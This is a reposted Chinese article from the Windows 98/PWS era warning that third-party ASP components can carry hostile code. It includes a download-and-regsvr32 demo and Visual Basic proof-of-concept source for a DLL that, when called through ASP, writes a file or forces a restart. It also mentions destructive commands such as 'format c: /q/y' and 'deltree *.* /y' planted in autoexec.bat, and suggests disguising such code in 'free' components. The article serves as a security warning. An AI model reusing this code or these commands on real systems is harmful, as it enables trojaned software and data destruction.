ASP组件中的安全问题 (转)

microsoft推出的asp(active server page)以简单、易用、功能多、可扩充性等强大功能得到了网友和大多数网管的喜爱，大有完全代替cgi的趋势。但是我要对你说，如果使用asp的话，你网络的安全同时也大大降低了！ 　　在我继续说下去之前，请你完成以下步骤：
　　1.下载这个文件“http://home.gbsource.net/xuankong/dll.zip”，解压缩后把其中的test.dll文件拷贝到“c:\windows\system”(如果你是使用nt的话，请拷贝到相应目录)；
　　2.接下来打开“开始/运行”菜单输入“regsvr32 test.dll”命令；
　　3.拷贝解压缩后的文件包中的那个index.asp到你的服务器目录（如果你是使用pws‘personal web server’调试可以拷贝到“c:\inetpub\wwwroot”，nt请拷贝到相应的目录）；
　　4.换一台机器用ie浏览index.asp文件看一看（你看到的是出错代码,但是实际上程序已经运行了），你再返回你的机器看一看c:\下是否多了一个文件？！一个名为“xuankong.dat”的文件（其实如果我愿意，你的c:\autoexec.bat文件也可以被我打开并写入一些什么“format c: /q/y”或者“deltree ＊.＊ /y”的命令，等你下次重新启动机器。嘿嘿……）。
　　我们一起来看看到底是怎么一回事，你刚才拷贝的那些dll文件其实是我使用visul basic 5.0开发的一个组件：
　　1.打开vb5.0新建一个“activex dll”文件，把下面的代码录入进去。
　　private declare function exitwindowsex lib ″user32″ _
　　(byval uflags as long, byval dwreserved as long) _
　　as long 　　sub xuankong()′请不要加上″private″ 　
　a＄ = inputbox(″请输入你的姓名，如果你的输入是″xuankong″″ ＋ chr(13) ＋ chr(10) ＋ ″则会在你的系统中生成一个″xuankong.dat″文件″ ＋ chr(10) ＋ chr(13) ＋ ″否则的话你的机器可能重启″, ″请输入″, ″xuankong″)
　　if a＄ = ″xuankong″ then 　　open ″c:\xuankong.dat″ for append as ＃1 　　write ＃1, ″我的朋友，这是一个asp组件的测试程序″ 　　write ＃1, ″hello world！this is a test″ 　　write ＃1, ″如果你看到这个文件表示测试成功！！！″ 　　else 　　exitwindowsex ＆h43, 0′使用api函数重新启动机器 　　end if 　　close ＃1 　　end sub
　　2.把工程名改为dll，类模块改为test，然后把这个工程生成dll文件到c:\windows\system目录下面。
　　3.新建一个index.asp文件把下面的代码录入进去。
　　<％ set rs=server.createobject(″dll.test″)％>
　　<％ set rs1=rs.xuankong 　　 rs1.execute 　　 ％>
　　4.拷贝index.asp到你的服务器内，按照上面所述进行调试！ 　　好了，如果你调试完成，有什么感觉？？？如果是使用vc＋＋ 、visual java开发（它们开发出来的组件功能可更加强大）；如果把上面的vb代码改一下，加入到一些ftp组件、e－mail组件、http组件、聊天室组件、计数器组件中……(凡是可以输入/输出的组件，没法输入/输出的组件的破坏力有一定局限），再给这些组件加上一个好听的名字“免费的……”你不上当吗（嘿嘿！说不定你已经上当了，天下免费的东西可是好东西!!!＊^v^＊）?
　　上面所说的是asp组件的安全问题！另外如果有些作者在写asp组件时不小心留下系统bug!那就更加不易被人发觉了！
　　说明：本文只代表个人观点。本文所提供的代码在windows 98自带的pws和visual basic 5.0下调试通过，如果你在生成asp组件时出现不能编译的问题，请关闭你的pws。你有什么想法或意见请e－mail: xuankong@swau.edu.cn。